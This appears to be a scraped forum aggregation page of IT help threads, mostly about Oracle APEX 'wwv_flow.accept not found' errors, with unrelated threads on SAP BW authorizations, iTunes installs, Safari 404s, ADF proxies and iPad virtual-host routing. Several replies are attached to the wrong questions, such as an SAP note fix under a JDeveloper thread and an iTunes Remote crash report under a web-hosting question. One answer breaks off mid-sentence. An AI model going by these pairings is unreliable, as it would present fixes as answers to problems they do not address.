/apex/wwv_flow.accept not found when accessing remotely after XE upgrade

Hi,
I upgraded my XE instance to APEX 3.2 and enabled remote connections using:
exec dbms_xdb.setListenerLocalAccess (l_access => FALSE);
Now, when I edit items or insert records on my created page, I end up getting a timeout accessing the wwv_flow.accept file.
For example, if I follow these steps:
1. Log into APEX remotely as workspace administrator (successful)
2. Navigate to application definition (successful)
3. Make a change to global notification and click APPLY CHANGES
4. The brower will time out on http://x.x.x.x:8080/apex/wwv_flow.accept
Note that there is no 404 error. Rather the browser simply times out. It doesn't matter if I use the ip or server name. I've removed all proxy settings, so it can't be that...
Some APEX items work, I suppose anything that does not reference wwv_flow.accept. For example, I can update an existing record (just not insert).
Also, everything works perfectly when I am accessing from the local server through the loopback interface.

  • After 4.2.1 upgrade get:  requested URL /pls/apex/wwv_flow.accept not found

    Hi,
Our hosted site just upgraded to 4.2.1 and I am getting:
The requested URL /pls/apex/wwv_flow.accept was not found on this server.
After trying to make a change on a master/detail form. I thought Apex 4.2 increased the # of fields on a master detail form so was surprised to see this error. Even when I reduce the number of columns showing on the detail part of the form which can have many rows as well, I am still getting the above error.
Has there been any change in 4.2 that would change the behavior of a straightforward save of a multi row master detail form?
In the past with Apex 4.0 I had to limit the columns being shown, but now I am reducing the # of columns even further and still get the error.
UPDATE: I just removed from the report region definition several columns (which were deselected from the Report Attributes so not actually showing in the master-detail form) and now I am at least able to add rows and save changes. Again I am totally surprised that this behavior is happening when I thought 4.2 allowed for MORE page items!!
I still cannot Delete rows from the detail section -- I get the odd message of :
ORA-02292: integrity constraint (ENTERPRISE_SYSTEMS.RESOURCE_REQUEST_CON) violated - child record found
But these rows have no child record!! They ARE the child records of the Master form. I had seen this behavior again related to the number of items showing on a page. Seems to me to be a bug in Apex that I had hoped would be removed with the 4.2 upgrade.
    Am I missing something!!

For the first problem, I'd check the alert log first, location:

  • BW: The following objects were not found when accessing server

    Hi All,
    Problem:
    - on the infoprovider, no authorization object is flagged as authorization relevant
When trying to open the query in display mode, I get the message "The following objects were not found when accessing server", when I press cancel, the attributes are not available in the query.
I tested with authorization objects and the only way to get these attributes visible is to put them in an authorization object with full (*) authorization for the field.
Why does the system checks this? Because I don't want to give full authorization.
Is there a way to unable this check, as I want the attributes to be visible (also without the *)
    +
When a query administrator with the sufficient authorization (sap_all or the * authorization for the field in the authorization object) is creating the query in query designer including the 'attributes' which are not visible with the 'normal' authorizations, the query will not list the columns in the output when it is executed by the normal user.
What can I do to get them visibIe in the output?
I can not create an authorization object for each of these attributes with * (full authorization)... as it is not logic, and no authorization should need to be checked...
Anyone who faced the same problem?

  • HELP"apple application support not found when installing itunes after a hard drive crash and replace

HELP"   error "apple application support not found" when downloading itunes after a hard drive crash and replacement????

Let's try a standalone Apple Application Support install. It still might not install, but fingers crossed any error messages will give us a better idea of the underlying cause of the issue.
Download and save a copy of the iTunesSetup.exe (or iTunes64setup.exe) installer file to your hard drive:
    http://www.apple.com/itunes/download/
Download and install the free trial version of WinRAR:
    http://www.rarlab.com/
Right-click the iTunesSetup.exe (or iTunes64Setup.exe), and select "Extract to iTunesSetup" (or "Extract to iTunes64Setup"). WinRAR will expand the contents of the file into a folder called "iTunesSetup" (or "iTunes64Setup").
Go into the folder and doubleclick the AppleApplicationSupport.msi to do a standalone AAS install.
Does it install properly for you? If so, does iTunes launch properly now?
If instead you get an error message during the install, let us know what it says. (Precise text, please.)

  • Page wwv_flow.accept not found

    Hello,
I recently installed Oracle XE 11G and then Apex 4.1.1 on a Windows 7 Home Premium server. I went to create a workspace before I restored any data or apps. I created a new Workspace, and after inputting all the data and receiving the confirmation, I received a Page Not Found error with the following URL:
    http://localhost:8080/apex/wwv_flow.accept
Any ideas as to what the problem is?

    Scott,
Thanks. I tried this but it is not even displaying anything. All the info I find is about using htmldb_item package inside a SQL statement. I must mention that my region is a PL/SQL block (not a SQL query). I have a lot of custom code inside which I have my SQL statement too. Here's my code snippet:
if (substr(v_service, 0, l_index-1) is not null) then
    select HTMLDB_ITEM.CHECKBOX(1,substr(v_service, 0, l_index-1)) "Z1",
    service_name into v_temp, v_sname
    from services
    where service_id = v_value;
    end if;
    Thanks.
    Shuba
PS: Who are you? You seem to be the guru of apex and you answer everyone's queries, which is so nice! :-)

  • Export / Import error (wwv_flow.accept not found)

Here is what I have ... (APEX version 2.2)
    - A machine running http server / database having a apex application built on it.
    - A second totally separate machine with http server / database and apex installed with no applications.
I want to export the application from one database and then import into the second database. So I exported the application using UNIX file format and saved away the file. Then I attempted to import this file with file type application and file char set Unicode. After clicking next I get the error 'File Not Found' with the url being http://<hostname>:7777/pls/htmldb/wwv_flow.accept
What am I missing? Thank you for any help and let me know if I am missing some information since I am new to this.

I am trying to export an application developed on 10gR2 on my Windows laptop with Apex 221 into an AIX (unix) 9iR2 9206 database, also running Apex 221. The user interface on both works.
I am connecting to both right now with the http bundled with 10gR2 on the same laptop until this evening when I can bounce the IAS so it can access the 9i database.
    I am getting this error:

    One thing I noticed:
FLOW_FILES.WWV_FLOW_FILE_OBJECTS$ does not have any grants on it that it can be updated. I'm eyeballing FLOWS_020200's privileges now.
What am I doing wrong? I'll most likely need to make the same change in the DAD on the IAS before I bounce it.

  • 404 File not Found when accessing Video Web server

I am trying to access a Video Web server remotely. Everything works fine on a PC and also on Internet Explorer for Mac.
When I login using Safari I get the error message "404 File not Found" "The requested URL was not found on this server"
I have been successful twice through Safari but after that it doesn't seem to work for days.
I have removed all cookies, emptied the Cache, reset safari, deleted all keychain access references to the website.
It seems to be a security issue but I am not sure what else to do.
Any ideas would be greatly appreciated

    Try using open DNS:
Adding Open DNS codes to your Network Preferences, should give good results in terms of speed-up as well as added security:
Open System Preferences/Network. Double click on your connection type, or select it in the drop-down menu, and in the box marked 'DNS Servers' add the following two numbers:
    208.67.222.222
    208.67.220.220
(You can also enter them if you click on Advanced and then DNS)

  • Class not Found when accessing Proxy class from backing bean in VC.

    Hi All,
I'm attempting to access a class of a webservice(generated as a proxy) within my ADF application and invoke the method within a backing bean of the View Controller(bean scope : backing bean). The proxy has generated an ObjectFactory class among other classes. When I access this Object factory class from within the backing bean, the application throws a Class not found error.
I don't know where the error lies since I've declared the View Controller of the ADF application dependent on the Proxy and I've imported the class and accessing it within a backing bean. How would you suggest I approach resolveing this.
    JDev : 1.1.1.4
    Thank you.
    Regards
    PP.

    Hello Arun,
Thank you for suggesting a Data control, but my requirement isn't to drag and drop the method as a button. It's more of a behind the scnes updating data via a database adapter requirement.
I've resolved the issue. turns out, my deployment archive didn't include the proxy.jpr. Once included it works likea charm.
    Thanks

    Hi Vinod Patil,
I just get the problem solved. I may show you the way and hope it help.
First you should apply the SAP note 1058240 (I am in EA-HR 600 level 27 but we still need to apply) into R/3 server. This note is asking you to patch a .SAR (I have no idea on this file) and you may ask your basis to import it. Make should it is imported and the restart the portal server.
This is what we do to solve the problem. Thanks.

  • Website not found when accessed from iPad

I am hosting multiple websites from a single IP address and have come across the following problem.  If I access it from my mac, the correct website is displayed, but if I use my iPad the web site is not found and my default website displays instead.
Checking the access log I can see a clear difference between what is passed from a mac and an ipad but don't know how to fix it, any suggestions greatly appreciated.
    The Mac sends this
    www.parksurgery-hursleyrd-ppg.org.uk 81.138.225.73 - - [03/Oct/2013:00:15:11 +0100] "GET / HTTP/1.1" 200 4857 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:24.0) Gecko/20100101 Firefox/24.0"
    The iPad sends this
    www.advtraining.co.uk 192.168.1.73 - - [03/Oct/2013:00:22:03 +0100] "GET / HTTP/1.1" 200 7847 "http://www.parksurgery-hursleyrd-ppg.org.uk/" "Mozilla/5.0 (iPad; CPU OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53"
the website I am trying to display is www.parksurgery-hursleyrd-ppg.org.uk

    Me too. 34000+ items.
Gotta wonder if that's a factor.
Just now I removed all remotes from iTunes.
(Prefs > Devices > Forget All Remotes)
Then I turned on Home Sharing on my iPhone.
(Tap the gear icon in the Library selection screen.)
Previously the iPhone was registered as a regular remote.
So both devices are controlling iTunes via home sharing.
Now iTunes is not crashing at all, in full-screen mode or otherwise.
Not sure if it will last, but time will tell.
Hope this is useful to you.
I'll post back if the crashes return.

After upgrading my iPad2 to ios6 and trying to connect to my wifi, my iPad2 tries to login for some reason to the Apple site but all that comes up is a 'Page Not Found' notification. I can browse the Apple site while in this browser but I can only go back, forward or cancel which then disconnects my iPad2 from my wifi.
Is there a solution to this issue? I've already tried clearing my browser history and data and resetting the iPad2 but to no avail

I'm trying to create a report query in Apex 3.2.1
    Home>Application Builder>Application 100>Shared Components>Report Queries>Edit Report Query
There are 5 queries and I'm trying to add additional queries, but when I click on Add Query I get the /apex/wwv_flow.accept was not found on this server error message page.
I've had this message before in tabular view forms, where one cell will contain text that causes the error on update, but when the data is removed the page saves OK.

    Any result to this post?
